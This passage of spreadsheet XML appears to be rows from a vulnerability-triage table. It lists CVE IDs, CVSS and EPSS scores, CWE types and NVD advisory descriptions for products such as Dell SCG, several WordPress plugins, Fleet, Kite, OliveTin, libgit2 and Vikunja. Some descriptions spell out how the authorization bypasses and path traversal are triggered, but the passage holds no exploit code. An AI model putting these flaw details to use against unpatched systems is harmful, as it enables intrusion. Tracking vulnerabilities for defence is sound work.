      <c r="M1095" s="5" t="inlineStr"/>
      <c r="N1095" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1095" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1095" s="5" t="inlineStr"/>
      <c r="Q1095" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R1095" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information disclosure.</t>
        </is>
      </c>
      <c r="S1095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79735</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80055</t>
        </is>
      </c>
      <c r="D1096" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1096" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1096" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1096" s="5" t="inlineStr"/>
      <c r="H1096" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1096" s="5" t="inlineStr"/>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1096" s="5" t="inlineStr"/>
      <c r="M1096" s="5" t="inlineStr"/>
      <c r="N1096" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1096" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1096" s="5" t="inlineStr"/>
      <c r="Q1096" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="R1096" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S1096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80055</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11838</t>
        </is>
      </c>
      <c r="D1097" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1097" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1097" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G1097" s="5" t="inlineStr"/>
      <c r="H1097" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1097" s="5" t="inlineStr"/>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr"/>
      <c r="L1097" s="5" t="inlineStr"/>
      <c r="M1097" s="5" t="inlineStr"/>
      <c r="N1097" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1097" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1097" s="5" t="inlineStr"/>
      <c r="Q1097" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1097" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability in Yordam Informatics Technology Consulting, Training, and Electronic Systems Industry and Trade Inc. Library Reservation System allows Input Data Manipulation.
This issue affects Library Reservation System: before v22.2.</t>
        </is>
      </c>
      <c r="S1097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11838</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14892</t>
        </is>
      </c>
      <c r="D1098" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1098" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1098" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1098" s="5" t="inlineStr"/>
      <c r="H1098" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1098" s="5" t="inlineStr"/>
      <c r="J1098" s="5" t="inlineStr"/>
      <c r="K1098" s="5" t="inlineStr"/>
      <c r="L1098" s="5" t="inlineStr"/>
      <c r="M1098" s="5" t="inlineStr"/>
      <c r="N1098" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1098" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1098" s="5" t="inlineStr"/>
      <c r="Q1098" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1098" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Tanium Server.</t>
        </is>
      </c>
      <c r="S1098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14892</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15398</t>
        </is>
      </c>
      <c r="D1099" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1099" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1099" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1099" s="5" t="inlineStr"/>
      <c r="H1099" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1099" s="5" t="inlineStr"/>
      <c r="J1099" s="5" t="inlineStr"/>
      <c r="K1099" s="5" t="inlineStr"/>
      <c r="L1099" s="5" t="inlineStr"/>
      <c r="M1099" s="5" t="inlineStr"/>
      <c r="N1099" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1099" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1099" s="5" t="inlineStr"/>
      <c r="Q1099" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1099" s="5" t="inlineStr">
        <is>
          <t>The Eventin – Event Calendar, Event Registration, Tickets &amp; Booking (AI Powered) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.1.22. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to bypass payment for paid events, fraudulently mark orders as completed, deplete ticket inventory, and trigger confirmation emails for tickets never purchased. This is exploitable by unauthenticated attackers because the wp_rest nonce is publicly emitted on every frontend page, and the order creation endpoint mints and returns an order_access_token to any caller possessing that nonce — giving unauthenticated users all credentials required to reach the privileged update_booking_status branch.</t>
        </is>
      </c>
      <c r="S1099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15398</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19802</t>
        </is>
      </c>
      <c r="D1100" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1100" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1100" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1100" s="5" t="inlineStr"/>
      <c r="H1100" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1100" s="5" t="inlineStr"/>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr"/>
      <c r="L1100" s="5" t="inlineStr"/>
      <c r="M1100" s="5" t="inlineStr"/>
      <c r="N1100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1100" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1100" s="5" t="inlineStr"/>
      <c r="Q1100" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1100" s="5" t="inlineStr">
        <is>
          <t>The Checkout Custom Fields Builder for WooCommerce plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.5. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate an arbitrary attacker-hosted plugin, resulting in remote code execution on the server. The required nonce is emitted inline on all admin pages accessible to subscribers when WooCommerce is inactive, meaning any subscriber-level user can harvest it and trigger the exploit without any additional privileges.</t>
        </is>
      </c>
      <c r="S1100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19802</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19946</t>
        </is>
      </c>
      <c r="D1101" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1101" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1101" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1101" s="5" t="inlineStr"/>
      <c r="H1101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1101" s="5" t="inlineStr"/>
      <c r="J1101" s="5" t="inlineStr"/>
      <c r="K1101" s="5" t="inlineStr"/>
      <c r="L1101" s="5" t="inlineStr"/>
      <c r="M1101" s="5" t="inlineStr"/>
      <c r="N1101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1101" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1101" s="5" t="inlineStr"/>
      <c r="Q1101" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1101" s="5" t="inlineStr">
        <is>
          <t>The Awesome Support plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 6.3.9. This is due to a missing capability check on the wpas_do_mr_deny_user() function, which unlike its counterpart wpas_do_mr_activate_user() does not enforce current_user_can('edit_users') or current_user_can('edit_user', $user_id), relying solely on a nonce that is not scoped to the target user. This makes it possible for authenticated attackers, with subscriber-level access and above, to set the mr_user_denied flag on any user account — including administrators — permanently blocking their moderated activation and dispatching a denial notification email to the victim.</t>
        </is>
      </c>
      <c r="S1101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19946</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1102" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33047</t>
        </is>
      </c>
      <c r="D1102" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1102" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1102" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1102" s="5" t="inlineStr"/>
      <c r="H1102" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1102" s="5" t="inlineStr"/>
      <c r="J1102" s="5" t="inlineStr"/>
      <c r="K1102" s="5" t="inlineStr"/>
      <c r="L1102" s="5" t="inlineStr"/>
      <c r="M1102" s="5" t="inlineStr"/>
      <c r="N1102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1102" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1102" s="5" t="inlineStr"/>
      <c r="Q1102" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1102" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, an object can be locked by a user who is not assigned write permissions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S1102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33047</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1103" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41262</t>
        </is>
      </c>
      <c r="D1103" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1103" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1103" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1103" s="5" t="inlineStr"/>
      <c r="H1103" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1103" s="5" t="inlineStr"/>
      <c r="J1103" s="5" t="inlineStr"/>
      <c r="K1103" s="5" t="inlineStr"/>
      <c r="L1103" s="5" t="inlineStr"/>
      <c r="M1103" s="5" t="inlineStr"/>
      <c r="N1103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1103" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1103" s="5" t="inlineStr"/>
      <c r="Q1103" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1103" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.85.0, the global policy read endpoint (GET /api/latest/fleet/policies/{policy_id}) fails to verify team ownership of the requested policy, allowing an authenticated user with observer-level access on any single team to read the full details of policies belonging to any other team and bypass Fleet's team isolation model. The handler authorizes the request against an empty policy object whose TeamID is nil, which an authorization rule permits for any user holding a role on any team, and then fetches the policy by ID with no team filter and returns it without any post-fetch scope check. Because policy IDs are sequential integers, an attacker can enumerate them to read other teams' policy SQL queries, host pass and fail counts, and associated software-installer and script metadata, exposing security-monitoring strategies and compliance posture across team boundaries. This issue is fixed in version 4.85.0.</t>
        </is>
      </c>
      <c r="S1103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41262</t>
        </is>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1104" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52730</t>
        </is>
      </c>
      <c r="D1104" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1104" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1104" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1104" s="5" t="inlineStr"/>
      <c r="H1104" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1104" s="5" t="inlineStr"/>
      <c r="J1104" s="5" t="inlineStr"/>
      <c r="K1104" s="5" t="inlineStr"/>
      <c r="L1104" s="5" t="inlineStr"/>
      <c r="M1104" s="5" t="inlineStr"/>
      <c r="N1104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1104" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1104" s="5" t="inlineStr"/>
      <c r="Q1104" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1104" s="5" t="inlineStr">
        <is>
          <t>Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.3, missing Authorization in Module::settingsForm allows to view (not change) super admin-restricted module settings and leak the full module entity. Exploitation of the vulnerability is possible on behalf of an authorized user who has access to the Module View feature, which are not granted to non-admins as standard. Users should upgrade to version 4.4.3 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.</t>
        </is>
      </c>
      <c r="S1104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52730</t>
        </is>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1105" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53487</t>
        </is>
      </c>
      <c r="D1105" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1105" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1105" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1105" s="5" t="inlineStr"/>
      <c r="H1105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1105" s="5" t="inlineStr"/>
      <c r="J1105" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K1105" s="5" t="inlineStr"/>
      <c r="L1105" s="5" t="inlineStr"/>
      <c r="M1105" s="5" t="inlineStr"/>
      <c r="N1105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1105" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1105" s="5" t="inlineStr"/>
      <c r="Q1105" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1105" s="5" t="inlineStr">
        <is>
          <t>Kite is a Kubernetes dashboard. Prior to version 0.12.3, authenticated Kite users with any role can request `/api/v1/overview` for a cluster that their roles do not permit by selecting that cluster with `x-cluster-name`. The overview route is registered before `middleware.RBACMiddleware()` and `GetOverview` only checks `len(user.Roles) &gt; 0`, so it returns aggregate Kubernetes inventory and capacity data from unauthorized clusters. Version 0.12.3 fixes the issue.</t>
        </is>
      </c>
      <c r="S1105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53487</t>
        </is>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1106" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53541</t>
        </is>
      </c>
      <c r="D1106" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1106" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1106" s="5" t="inlineStr"/>
      <c r="H1106" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1106" s="5" t="inlineStr"/>
      <c r="J1106" s="5" t="inlineStr"/>
      <c r="K1106" s="5" t="inlineStr"/>
      <c r="L1106" s="5" t="inlineStr"/>
      <c r="M1106" s="5" t="inlineStr"/>
      <c r="N1106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1106" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1106" s="5" t="inlineStr"/>
      <c r="Q1106" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1106" s="5" t="inlineStr">
        <is>
          <t>OliveTin gives access to predefined shell commands from a web interface. The `filterToDefinedArgumentsOnly` function in the executor is intended to discard any arguments not explicitly defined in the action's configuration. However, prior to commit ebffd9f040f791208aee1db2e5a8aecd1e3e603d, a special case allows any argument whose name starts with `ot_` to bypass this filter. While two system arguments (`ot_executionTrackingId` and `ot_username`) are injected by OliveTin and overridden, all other `ot_`-prefixed arguments supplied by the user pass through unmodified. These bypassed arguments are not type-checked — the validation loop only iterates over the action's defined arguments, so `ot_`-prefixed arguments skip all type safety checks entirely; set as environment variables — via `buildEnv()`, with completely unvalidated values, and passed to the executed command; and included in the template context — available as `.Arguments.ot_*` in template rendering. Commit ebffd9f040f791208aee1db2e5a8aecd1e3e603d contains a patch.</t>
        </is>
      </c>
      <c r="S1106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53541</t>
        </is>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1107" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53584</t>
        </is>
      </c>
      <c r="D1107" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1107" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1107" s="5" t="inlineStr"/>
      <c r="H1107" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1107" s="5" t="inlineStr"/>
      <c r="J1107" s="5" t="inlineStr"/>
      <c r="K1107" s="5" t="inlineStr"/>
      <c r="L1107" s="5" t="inlineStr"/>
      <c r="M1107" s="5" t="inlineStr"/>
      <c r="N1107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1107" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1107" s="5" t="inlineStr"/>
      <c r="Q1107" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1107" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, libgit2 does not reject traversal components in a submodule path loaded from .gitmodules. The affected src/libgit2/submodule.c paths include git_submodule_lookup and git_submodule_add_setup. A crafted repository can specify a path such as ../escape-target, and applications that initialize the submodule can create directories outside the repository working tree. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="S1107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53584</t>
        </is>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1108" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54614</t>
        </is>
      </c>
      <c r="D1108" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1108" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1108" s="5" t="inlineStr"/>
      <c r="H1108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1108" s="5" t="inlineStr"/>
      <c r="J1108" s="5" t="inlineStr"/>
      <c r="K1108" s="5" t="inlineStr"/>
      <c r="L1108" s="5" t="inlineStr"/>
      <c r="M1108" s="5" t="inlineStr"/>
      <c r="N1108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1108" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1108" s="5" t="inlineStr"/>
      <c r="Q1108" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="R1108" s="5" t="inlineStr">
        <is>
          <t>DebugKit provides a debugging toolbar for CakePHP applications. Prior to 4.10.3 and 5.2.4, the DebugKit MailPreview feature in src/Controller/MailPreviewController.php accepts a route-controlled previewName value in findPreview and passes the resolved class from App::className() to constructor execution without rejecting namespace separators or verifying that the class extends DebugKit\Mailer\MailPreview. An attacker able to access DebugKit while debug mode is enabled and the request hostname is local or allowlisted can select an unintended application class through the mail-preview preview route, resulting in arbitrary constructor execution and limited disclosure of application information. This issue is fixed in versions 4.10.3 and 5.2.4.</t>
        </is>
      </c>
      <c r="S1108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54614</t>
        </is>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1109" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55064</t>
        </is>
      </c>
      <c r="D1109" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1109" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1109" s="5" t="inlineStr"/>
      <c r="H1109" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1109" s="5" t="inlineStr"/>
      <c r="J1109" s="5" t="inlineStr"/>
      <c r="K1109" s="5" t="inlineStr"/>
      <c r="L1109" s="5" t="inlineStr"/>
      <c r="M1109" s="5" t="inlineStr"/>
      <c r="N1109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1109" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1109" s="5" t="inlineStr"/>
      <c r="Q1109" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1109" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 2.3.0 until 2.4.0, a user with Write but not Admin permission on a shared child project can detach it from its parent hierarchy by submitting parent_project_id equal to 0 to POST /api/v1/projects/{project}. The Project.CanUpdate authorization check in pkg/models/project_permissions.go and UpdateProject logic in pkg/models/project.go only gate nonzero parent values, while UpdateProject always persists parent_project_id, so the explicit zero value bypasses the Admin requirement introduced for CVE-2026-35595. Detachment severs the recursive permission-inheritance chain and can disrupt the owner’s hierarchy and inherited collaborator access. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="S1109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55064</t>
        </is>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1110" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55227</t>
        </is>
      </c>
      <c r="D1110" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1110" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1110" s="5" t="inlineStr"/>
      <c r="H1110" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1110" s="5" t="inlineStr"/>
      <c r="J1110" s="5" t="inlineStr"/>
      <c r="K1110" s="5" t="inlineStr"/>
      <c r="L1110" s="5" t="inlineStr"/>
      <c r="M1110" s="5" t="inlineStr"/>
      <c r="N1110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1110" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1110" s="5" t="inlineStr"/>
      <c r="Q1110" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R1110" s="5" t="inlineStr">
        <is>
